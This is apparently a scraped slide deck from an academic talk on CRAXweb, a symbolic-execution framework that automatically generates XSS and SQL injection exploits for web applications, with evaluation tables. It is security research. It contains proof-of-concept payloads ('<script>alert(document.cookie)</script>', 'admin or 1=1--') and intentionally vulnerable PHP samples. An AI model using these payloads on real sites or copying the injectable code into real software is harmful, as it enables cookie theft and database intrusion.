Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 

CRAXweb: Automatic web application testing and attack generation

  • 1. CRAXweb: Web Testing and Attacks through “QEMU” in S2E Shih-Kun Huang National Chiao Tung University Hsinchu, Taiwan skhuang@cs.nctu.edu.tw
  • 2. Motivation • Symbolic Execution is effective to crash applications – Catchconv, Bitfuzz, Taintscope, and Ardilla (PHP) – Should be effective for Web Testing • Symbolic Execution can also automate exploit generation process – AEG, MAYHEM, CRAX – Should be feasible to automate Web Attack (exploit) generation
  • 3. How Effective of Automatic Exploit Generation for non-web applications • Mplayer (1.5MLOC) (CVE-2008-0630) – MPlayer 1.0rc2 and SVN before r25823 – 3.6 seconds • Microsoft Office Word (CVE-2012-0158) – Microsoft Office < 2010 – 216 seconds • Nginx (CVE-2013-2028) – nginx 1.3.9/1.4.0 stack buffer overflow – 8 seconds
  • 4. Problems of Symbolic Web Testing and Attacks • Hard to Implement Symbolic Execution Platform for Web – MIT’s Ardilla not in public and only for PHP – Various number of Web platforms: PHP, JSP, Python, Perl, Ruby, ASP • Variety of Attack Methods – Non-web attacks: stack, heap, format, integer, uninitialized uses, race,… – OWASP top attacks: injection, XSS, CSRF,…
  • 5. Web Platform Independent Testing • (PHP,JSP,ASP,NodeJS,Python,Ruby,…) symbolic execution engine ? – QEMU–based symbolic execution engine -> S2E • Issues – Performance should be the primary consideration – Will symbolic semantics be preserved ? Across between Web semantics and llvm semantics.
  • 6. Attack Independent Exploit Generation • Taint Analysis – Input tainted operations • Symbolic Continuations (what to do next ?) – Symbolic program counter (Symbolic EIP) • Where the EIP points to – Symbolic SQL query • Where the SQL commands run – Symbolic HTML response • Where the Javascript executes – Symbolic command argument • Where the shell commands run
  • 7. The power of Symbolic Computation • Symbolic Execution – Generating Testing input, following all feasible branches • Concolic Execution – Generating Testing input, following a concrete input path and the associated branches • Exploit Generation – Generating Exploit input, following a concrete Crash/Anomaly input path and branch to the associated “shell code” – Path Constraint generated by the crash input – Constraints of Symbolic “continuations” branching to the shell code
  • 8. Symbolic Execution • Explore every possible path of a program – Record path information in path constraint Path constraint 1 Symbolic input A program Path constraint 2 Path constraint 3 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 8
  • 9. Concolic Execution • Begin with a random input • Use false path constraint to generate another input case Output1 Input 1 Path constraint 1 Input 2 A program Output2 Path constraint 2 Output3 Input 3 Path constraint 3 …… 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework …… 9
  • 10. Exploit Generation • Record the path constraint of the given crash input Crash Input: x A program Output: y Path constraint 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 10
  • 11. Constraint Solving Unknown input: x A program Output: y Path constraint • Given program output y, constraint solving is the way to generate input x Output: y + Solve constraint Value of input x Path constraint 11
  • 12. Constraint Solving • If f(x) = 100, what’s the value of x? Known output =100 Unknown input: x Sample code 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 12
  • 13. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint Sample code PC of path 1 Path constraint PC of path 2 X+10 > 0 X+10 <= 0 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 13
  • 14. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 Sample code PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 14
  • 15. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 – Solve the constraint • x = 90 Sample code input: x=90 PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 Constraint solving X = 90 No solution 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 15
  • 16. Constraint Solving • What’s the XSS exploit of the given sample code? Sample code 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 16
  • 17. Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response HTTP Request Unknown input (XSS attack) GET /index.php?id=[ input ] HTTP/1.1 Host: example.com HTTP Response Known output (an alert script) HTTP/1.1 200 OK Context-type: text/html Sample code <html> some text [ output ] </html> 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 17
  • 18. Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response – Add JavaScript code as target character • output = <script>alert(document.cookie)</script> HTTP Response ;rbqhos=… HTTP Request GET /index.php?id=[ input ] HTTP/1.1 Host: example.com Sample code <script>… 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) <html> some text [ output ] 4 echo chr(ord($input[$i])+1); </html> 5 ?> HTTP/1.1 200 OK Context-type: text/html 18
  • 19. Constraint Solving • What’s the XSS exploit of given sample code? – Symbolic request & response – Add JavaScript code as target character • output = <script>alert(document.cookie)</script> – Solve the constraint • input = ;rbqhos=`kds’cnbtldms-bnnjhd(;,rbqhos= HTTP Response ;rbqhos=… HTTP Request GET /index.php?id=[ input ] HTTP/1.1 Host: example.com Sample code <script>… 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) <html> some text [ output ] 4 echo chr(ord($input[$i])+1); </html> 5 ?> HTTP/1.1 200 OK Context-type: text/html 19
  • 20. Path Constraints Input Path constraint Target output Solved output input[0] chr(input[0]+1) < ; input[1] chr(input[1]+1) s r input[2] chr(input[2]+1) c b input[3] chr(input[3]+1) r q input[4] chr(input[4]+1) i h input[5] chr(input[5]+1) p o input[6] chr(input[6]+1) t s input[7] chr(input[7]+1) > = input[8] chr(input[8]+1) a ` input[9] chr(input[9]+1) l k … … … … 20
  • 21. Exploit Generation of Single URL • This method can check security risk of a single URL HTTP Response HTTP/1.1 200 OK Context-type: text/html <script>alert(document.cookie)</script> <html> some text [ output ] </html> mysql_query admin or 1=1-- SELECT * FROM user WHERE user=[symbolic] 21
  • 22. Exploit Generation • Generate exploit of a web application 22
  • 23. Single Path Concolic Execution • In order to reduce the overhead on symbolic execution HTTP Request HTTP Request GET index.php?abc=[ Host: 123.123.123.123 ] HTTP/1.1 Symbolic execution: Explore all possible paths GET index.php?abc=[AAAAA] HTTP/1.1 Host: 123.123.123.123 Single path concolic execution: Only explore the path of the given input 23
  • 25. Outline • Introduction • Background • Method – Exploit Generation – System Architecture • Related Work • Evaluation • Conclusion and Future Work 25
  • 26. System Architecture • • • • Symbolic Environment on S2E CRAXWeb Architecture CRAX Framework Detail of CRAXWeb – Web Crawler – Symbolic Request Sender – Symbolic Data Sensor – Exploit Generator 26
  • 27. S2E (Selective Symbolic Execution) Symbolic data sender Exploit generator 27
  • 28. S2E (Selective Symbolic Execution) Symbolic data sender For XSS attack Symbolic data sensor Exploit generator 28
  • 29. S2E (Selective Symbolic Execution) Symbolic data sensor Symbolic data sender For SQL injection attack Exploit generator 29
  • 30. CRAXWeb Architecture Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 30
  • 32. Web Crawler Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web Web crawler crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 32
  • 33. Web Crawler (Burp Suite) Web application GET index.php?abc=xxxxx HTTP/1.1 Host: example.com Web crawler Database POST index.php HTTP/1.1 Host: example.com Content-length: 40 a=xxxx&b=xxx 33
  • 34. Symbolic Request Sender Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Symbolic request request sender sender Expolit generator Sym. Web Server Socket Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 34
  • 35. Symbolic Data Sender Web crawler Database 1. Experiment request Control node Symbolic data sender 2. Experiment response Web application 2014/2/11 35
  • 36. Symbolic Data Sensor Test unit S2E QEMU (server) Web application Symbolic Symbolic data data sensor sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic Symbolic data data sensor sensor s2e_myop STP Solver (client) 36
  • 37. Symbolic Data Sensor Sensitive data Symbolic data sensor Exploit generator If it is a symbolic data, The sensor can call exploit generator Web security issues XSS SQL injection … 2014/2/11 Sensor location HTTP Response mysql_query() … 37
  • 38. Other Web Security issues Sensor location PHP Python Remote file Inclusion Directory traversal Command injection Code Injection File upload include(), include_once() … fopen(), file() … include(), require()… open()… system(), file()… system(), exec()… eval()… move_uploaded_file(), rename(), … eval()… open()… 38
  • 39. Exploit Generator Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Exploit Expolit generator generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 39
  • 41. Exploit Generator SELECT * FROM user WHERE user=[symbolic] …… symbolic Sample code 1 <?php 2 $input = base64_decode($_GET[‘user']); 3 mysql_query(“SELECT * FROM user 4 WHERE user=”. $input); 5 ?> ... x.php?user=YWRtaW4gb3Ig... 41
  • 49. Evaluation for Web platform independence Test case ~= echo(“A”x50) OT >= 12hr PHP JSP Rails Django ASP Framework - - 3.2 0.96.1 - OS Linux Linux Linux Linux Windows Server Apache-2.2.19 Tomcat-7.0.2 Webrick Built-in IIS-5.1 Kernel PHP-5.3.6 JDK-7u2 Ruby-1.9.3 Python-2.6.6 ASP-3.0 Bind Port 80 8080 3000 8000 80 Symbolic response time 18.50s 6.72min 7.45min 32.72s OT Without constraints 16.42s 3.25min 5.62min 24.02s OT 49
  • 50. Evaluation for XSS OT >= 15min Test Case Line Of Code # of crawled request # of XSS # of XSS (vulnerable) by MIT Time per exploit Time for all crawled request Schoolmate-1.5.4 8,125 452 19 14 0.30min 107.78min + 30OT Webchess-1.0.0rc2 6,504 410 5(4) 13 0.80min 94.38min + 313OT Faqforge-1.3.2 1,710 28 4 4 0.20min 5.74 min EVE 904 12 2 2 0.42min 4.94min Test Case Line Of Code Platform # of crawled request # of XSS (vulnerabl e) Time per exploit Time for all crawled request SimpGB-1.49.02 41,296 PHP 1,299 33(57) 0.91min 7.67hr + 334OT DedeCms-5.6 84,544 PHP 1,111 11(13) 0.48min 8.32hr + 9OT Django-admin-0.96.1 3,558 Python 5 1 5.29min 5.29min + 4OT Discuz!-6.0 67,088 PHP 613 0(1) 0.85min 8.37hr + 12OT Joomla-1.6 253,711 PHP 215 0(7) 2.17min 1.26hr + 117OT 50
  • 51. Evaluation for SQL injection Test Case Schoolmate Webchess Faqforge 1.54 1.0.0rc2 EVE 1.3.2 Testlink phpreci- 1.8.4 piebook 2.24 Line of code 8125 6504 1710 904 144913 52631 CVE - - - - 2009- 2009- 4238 4883 # of crawled request 269 65 7 9 218 65 # of SQLi (vulnerable) 12 6 3 3 9 6 # of SQLi by MIT 6 12 1 2 - - Time per exploit 0.55 min 0.39 min 0.27 min 0.24 3.24min 4.89min 2.12 706.4min 315.2min min (30 TO) (32 TO) 934 18047 6322 min Time for all crawled 148.58 min 25.15 min 1.88min requests # of all solved constraints 952 15254 1104 TO: Timeout 51
  • 53. Automatic Web Attack Generator • Based on symbolic execution – White box – Only support specific language • Based on reply value of server – Black box – Hard to handle encrypted data 53
  • 54. Related Work Approach year Attacks/ Detectd Generation Algorithm W/B Box WB Plateform SAFELI 2008 SQLI Attack Statically inspect bytecode of application Apollo 2008 WB PHP WB PHP 2010 Malformed HTML Use Concolic execution to find bugs in PHP Detect web applications XSS, SQLI Attack It combines concrete and symbolic execution to covers paths XSS, SQLI Attack Attack gramma and symbolic execution Adrilla 2009 Kudzu WB JavaScript PIUIVT 2010 XSS, SQLI Attack Perturbation based Algorithm WB Java MySQLInject or NKSI Scan 2011 SQLIJ Attack BB PHP 2012 SQLIJ Attack BB JSP, ASP CRAX Web 2012 XSS, SQLI Attack Blind SQL Injection based on True/False, Order by Modulize SQL Injection patten to generate attack string Single path symbolic execution WB XSS: All, SQLI: PHP JAVA 54
  • 55. Related Work Approach Year Attacks / Detectd SAFELI Apollo 2008 2008 Adrilla 2009 SQLI Attack Malformed HTML Detect XSS, SQLI Attack Kudzu PIUIVT MySQLInjector NKSI Scan 2010 2010 2011 2012 CRAX Web 2012 W / B Plateform Box W JAVA W PHP W PHP XSS, SQLI Attack XSS, SQLI Attack SQLI Attack SQLI Attack W W B B JavaScript JAVA PHP JSP, ASP XSS, SQLI Attack W XSS: All, SQLI: PHP 55
  • 56. Conclusion • A framework to generate exploit of web application – Support XSS and SQL injection Web application CRAX Web Vulnerability Report • A successful trial of Symbolic Execution for Web by S2E 56
  • 57. Future Work • Implement this structure on other kind of exploit generation Other Web Security issues Remote file Inclusion / Local File Inclusion Directory traversal Command injection Code Injection File upload 2014/2/11 Target Functions include(), include_once(), require(), requireonce()… fopen(), file(), unlink… system(), file()… eval()… move_uploaded_file(), rename(), … Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 57
  • 58. Open Doors to More Work • Symbolic Executions by S2E for – PHP, Python – JSP, Ruby – ASP, Perl – Node JS